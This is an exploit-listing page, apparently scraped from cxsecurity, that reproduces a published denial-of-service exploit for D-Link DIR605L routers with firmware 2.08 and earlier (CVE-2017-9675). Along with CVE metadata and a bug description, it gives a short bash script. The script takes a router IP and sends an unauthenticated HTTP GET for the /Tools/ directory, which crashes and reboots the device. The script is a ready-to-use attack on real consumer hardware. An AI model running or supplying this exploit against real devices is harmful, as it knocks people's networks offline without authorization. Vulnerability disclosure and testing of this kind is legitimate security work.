D-Link DIR605L 2.08 Denial Of Service

CVE	Category	Price	Severity
CVE-2017-9675	CWE-400	$1,000	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2017-11-16

CPE
cpe:cpe:/h:d-link:dir605l:2.08

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017110092

Below is a copy:

D-Link DIR605L 2.08 Denial Of Service

# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for 
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered 
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
 
if [ "$#" -ne 1 ]; then
    echo "usage: $0 <router_ip>"
    exit
fi
     
curl http://$ROUTER/Tools/

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum